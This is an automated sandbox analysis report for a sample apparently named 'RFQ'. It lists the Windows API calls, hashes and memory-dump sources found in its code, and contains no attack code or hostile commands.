                                                                          • API String ID: 1976402638-0
                                                                          • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                          • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                          • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                          • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                          • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                          • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                          • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                          • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 642888154-0
                                                                          • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                          • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                          • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                          • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ClearErrorLast
                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                          • API String ID: 2487901850-572801152
                                                                          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 1871949834-0
                                                                          • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                          • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                          • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                          • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                          • SendMessageW.USER32 ref: 00471AE3
                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                          • String ID:
                                                                          • API String ID: 3611059338-0
                                                                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                                          • String ID:
                                                                          • API String ID: 1640429340-0
                                                                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • _wcslen.LIBCMT ref: 004438CD
                                                                          • _wcslen.LIBCMT ref: 004438E6
                                                                          • _wcstok.LIBCMT ref: 004438F8
                                                                          • _wcslen.LIBCMT ref: 0044390C
                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                          • _wcstok.LIBCMT ref: 00443931
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 3632110297-0
                                                                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 752480666-0
                                                                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
APIs
• Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
• QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• SendMessageW.USER32 ref: 004555C7
• SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconWindow
• String ID:
• API String ID: 3691411573-0
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
• LineTo.GDI32(?,?,?), ref: 004472AC
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
• LineTo.GDI32(?,?,?), ref: 004472C6
• EndPath.GDI32(?), ref: 004472D6
• StrokePath.GDI32(?), ref: 004472E4
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
• String ID:
• API String ID: 372113273-0
APIs
• GetDC.USER32(00000000), ref: 0044CC6D
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
• ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
APIs
• __getptd.LIBCMT ref: 0041708E
  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
• __amsg_exit.LIBCMT ref: 004170AE
• __lock.LIBCMT ref: 004170BE
• InterlockedDecrement.KERNEL32(?), ref: 004170DB
• _free.LIBCMT ref: 004170EE
• InterlockedIncrement.KERNEL32(03042DA0), ref: 00417106
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
• String ID:
• API String ID: 3470314060-0
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 0044B655
• EnterCriticalSection.KERNEL32(?), ref: 0044B666
• TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
• WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
• LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                          • String ID:
                                                                          • API String ID: 442100245-0
                                                                          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                          • _wcslen.LIBCMT ref: 0045F94A
                                                                          • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 621800784-4108050209
                                                                          • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                          • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SetErrorMode.KERNEL32 ref: 004781CE
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                          • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                          • String ID: \VH
                                                                          • API String ID: 3884216118-234962358
                                                                          • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                          • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                          • IsMenu.USER32(?), ref: 0044854D
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                          • DrawMenuBar.USER32 ref: 004485AF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                          • String ID: 0
                                                                          • API String ID: 3076010158-4108050209
                                                                          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove_wcslen
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1589278365-1403004172
                                                                          • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                          • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
